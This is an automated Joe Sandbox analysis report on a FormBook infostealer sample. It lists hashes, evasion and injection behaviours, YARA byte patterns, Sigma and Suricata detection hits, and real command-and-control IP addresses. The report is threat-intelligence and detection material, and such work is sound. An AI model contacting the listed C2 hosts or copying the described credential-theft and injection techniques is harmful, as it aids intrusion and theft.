Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fJD7ivEnzm.exe

Overview

General Information

Sample name:fJD7ivEnzm.exe
renamed because original name is a hash value
Original sample name:f5d173e1e89e02211fa67806e20fcf4fb9c7dcd656929ffad54840454bae58a9.exe
Analysis ID:1529089
MD5:46bb75d27887b28474a3eb4570d89ca5
SHA1:ac12d22d8683b2129c848661eb4c130c99fc8923
SHA256:f5d173e1e89e02211fa67806e20fcf4fb9c7dcd656929ffad54840454bae58a9
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • fJD7ivEnzm.exe (PID: 6308 cmdline: "C:\Users\user\Desktop\fJD7ivEnzm.exe" MD5: 46BB75D27887B28474A3EB4570D89CA5)
    • svchost.exe (PID: 6520 cmdline: "C:\Users\user\Desktop\fJD7ivEnzm.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • IqZHJpXEsts.exe (PID: 5744 cmdline: "C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 5172 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • IqZHJpXEsts.exe (PID: 2844 cmdline: "C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5460 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.3638995982.00000000035D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2df63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16192:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\fJD7ivEnzm.exe", CommandLine: "C:\Users\user\Desktop\fJD7ivEnzm.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\fJD7ivEnzm.exe", ParentImage: C:\Users\user\Desktop\fJD7ivEnzm.exe, ParentProcessId: 6308, ParentProcessName: fJD7ivEnzm.exe, ProcessCommandLine: "C:\Users\user\Desktop\fJD7ivEnzm.exe", ProcessId: 6520, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\fJD7ivEnzm.exe", CommandLine: "C:\Users\user\Desktop\fJD7ivEnzm.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\fJD7ivEnzm.exe", ParentImage: C:\Users\user\Desktop\fJD7ivEnzm.exe, ParentProcessId: 6308, ParentProcessName: fJD7ivEnzm.exe, ProcessCommandLine: "C:\Users\user\Desktop\fJD7ivEnzm.exe", ProcessId: 6520, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-08T16:34:09.577337+020020507451Malware Command and Control Activity Detected192.168.2.449736148.72.152.17480TCP
            2024-10-08T16:34:32.773056+020020507451Malware Command and Control Activity Detected192.168.2.4498543.33.130.19080TCP
            2024-10-08T16:34:46.735729+020020507451Malware Command and Control Activity Detected192.168.2.449929172.191.244.6280TCP
            2024-10-08T16:35:00.539585+020020507451Malware Command and Control Activity Detected192.168.2.450009172.96.191.3980TCP
            2024-10-08T16:35:14.675773+020020507451Malware Command and Control Activity Detected192.168.2.450020217.70.184.5080TCP
            2024-10-08T16:35:29.400431+020020507451Malware Command and Control Activity Detected192.168.2.45002463.250.47.4080TCP
            2024-10-08T16:35:42.903755+020020507451Malware Command and Control Activity Detected192.168.2.45002891.184.0.20080TCP
            2024-10-08T16:35:56.288842+020020507451Malware Command and Control Activity Detected192.168.2.45003213.248.169.4880TCP
            2024-10-08T16:36:24.175518+020020507451Malware Command and Control Activity Detected192.168.2.45004043.242.202.16980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-08T16:34:09.577337+020028554651A Network Trojan was detected192.168.2.449736148.72.152.17480TCP
            2024-10-08T16:34:32.773056+020028554651A Network Trojan was detected192.168.2.4498543.33.130.19080TCP
            2024-10-08T16:34:46.735729+020028554651A Network Trojan was detected192.168.2.449929172.191.244.6280TCP
            2024-10-08T16:35:00.539585+020028554651A Network Trojan was detected192.168.2.450009172.96.191.3980TCP
            2024-10-08T16:35:14.675773+020028554651A Network Trojan was detected192.168.2.450020217.70.184.5080TCP
            2024-10-08T16:35:29.400431+020028554651A Network Trojan was detected192.168.2.45002463.250.47.4080TCP
            2024-10-08T16:35:42.903755+020028554651A Network Trojan was detected192.168.2.45002891.184.0.20080TCP
            2024-10-08T16:35:56.288842+020028554651A Network Trojan was detected192.168.2.45003213.248.169.4880TCP
            2024-10-08T16:36:24.175518+020028554651A Network Trojan was detected192.168.2.45004043.242.202.16980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-08T16:34:25.149111+020028554641A Network Trojan was detected192.168.2.4498073.33.130.19080TCP
            2024-10-08T16:34:27.700097+020028554641A Network Trojan was detected192.168.2.4498203.33.130.19080TCP
            2024-10-08T16:34:30.224719+020028554641A Network Trojan was detected192.168.2.4498383.33.130.19080TCP
            2024-10-08T16:34:38.867603+020028554641A Network Trojan was detected192.168.2.449884172.191.244.6280TCP
            2024-10-08T16:34:41.458048+020028554641A Network Trojan was detected192.168.2.449898172.191.244.6280TCP
            2024-10-08T16:34:44.172027+020028554641A Network Trojan was detected192.168.2.449915172.191.244.6280TCP
            2024-10-08T16:34:53.052676+020028554641A Network Trojan was detected192.168.2.449965172.96.191.3980TCP
            2024-10-08T16:34:55.405586+020028554641A Network Trojan was detected192.168.2.449979172.96.191.3980TCP
            2024-10-08T16:34:58.160208+020028554641A Network Trojan was detected192.168.2.449990172.96.191.3980TCP
            2024-10-08T16:35:06.383956+020028554641A Network Trojan was detected192.168.2.450017217.70.184.5080TCP
            2024-10-08T16:35:09.393252+020028554641A Network Trojan was detected192.168.2.450018217.70.184.5080TCP
            2024-10-08T16:35:13.005498+020028554641A Network Trojan was detected192.168.2.450019217.70.184.5080TCP
            2024-10-08T16:35:21.787157+020028554641A Network Trojan was detected192.168.2.45002163.250.47.4080TCP
            2024-10-08T16:35:24.221471+020028554641A Network Trojan was detected192.168.2.45002263.250.47.4080TCP
            2024-10-08T16:35:26.921304+020028554641A Network Trojan was detected192.168.2.45002363.250.47.4080TCP
            2024-10-08T16:35:35.132418+020028554641A Network Trojan was detected192.168.2.45002591.184.0.20080TCP
            2024-10-08T16:35:37.638029+020028554641A Network Trojan was detected192.168.2.45002691.184.0.20080TCP
            2024-10-08T16:35:40.497999+020028554641A Network Trojan was detected192.168.2.45002791.184.0.20080TCP
            2024-10-08T16:35:48.432482+020028554641A Network Trojan was detected192.168.2.45002913.248.169.4880TCP
            2024-10-08T16:35:50.957525+020028554641A Network Trojan was detected192.168.2.45003013.248.169.4880TCP
            2024-10-08T16:35:53.691644+020028554641A Network Trojan was detected192.168.2.45003113.248.169.4880TCP
            2024-10-08T16:36:16.506159+020028554641A Network Trojan was detected192.168.2.45003743.242.202.16980TCP
            2024-10-08T16:36:19.055163+020028554641A Network Trojan was detected192.168.2.45003843.242.202.16980TCP
            2024-10-08T16:36:21.606190+020028554641A Network Trojan was detected192.168.2.45003943.242.202.16980TCP
            2024-10-08T16:36:30.319022+020028554641A Network Trojan was detected192.168.2.450041103.224.182.24280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: fJD7ivEnzm.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: fJD7ivEnzm.exeReversingLabs: Detection: 68%
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3638995982.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1996763400.0000000003850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3638935792.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1996814627.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3639798172.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: fJD7ivEnzm.exeJoe Sandbox ML: detected
            Source: fJD7ivEnzm.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IqZHJpXEsts.exe, 00000004.00000000.1922332064.00000000000FE000.00000002.00000001.01000000.00000004.sdmp, IqZHJpXEsts.exe, 00000007.00000002.3638744641.00000000000FE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: fJD7ivEnzm.exe, 00000000.00000003.1793057046.0000000004840000.00000004.00001000.00020000.00000000.sdmp, fJD7ivEnzm.exe, 00000000.00000003.1789568752.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1899809963.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1901863289.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996459004.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996459004.0000000003500000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640025456.0000000003C4E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.1996513714.000000000375A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640025456.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.1998537625.0000000003902000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: fJD7ivEnzm.exe, 00000000.00000003.1793057046.0000000004840000.00000004.00001000.00020000.00000000.sdmp, fJD7ivEnzm.exe, 00000000.00000003.1789568752.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1899809963.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1901863289.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996459004.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996459004.0000000003500000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.3640025456.0000000003C4E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.1996513714.000000000375A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640025456.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.1998537625.0000000003902000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000002.1996320548.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1964838255.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, IqZHJpXEsts.exe, 00000004.00000002.3639292948.00000000014A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000006.00000002.3640439126.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3639094585.000000000365E000.00000004.00000020.00020000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000000.2067866976.0000000002D4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2390344641.000000002249C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000006.00000002.3640439126.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3639094585.000000000365E000.00000004.00000020.00020000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000000.2067866976.0000000002D4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2390344641.000000002249C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000002.1996320548.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1964838255.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, IqZHJpXEsts.exe, 00000004.00000002.3639292948.00000000014A8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032FC2C0 FindFirstFileW,FindNextFileW,FindClose,6_2_032FC2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax6_2_032E9B90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi6_2_03302399
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h6_2_039004DE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49820 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49807 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49854 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49854 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49929 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49929 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49884 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49838 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49965 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49979 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49990 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50009 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50009 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49898 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50032 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50024 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49915 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50032 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50024 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50040 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50040 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50028 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50028 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50020 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50020 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 63.250.47.40:80
            Source: Joe Sandbox ViewIP Address: 172.191.244.62 172.191.244.62
            Source: Joe Sandbox ViewIP Address: 63.250.47.40 63.250.47.40
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: HOSTNETNL HOSTNETNL
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
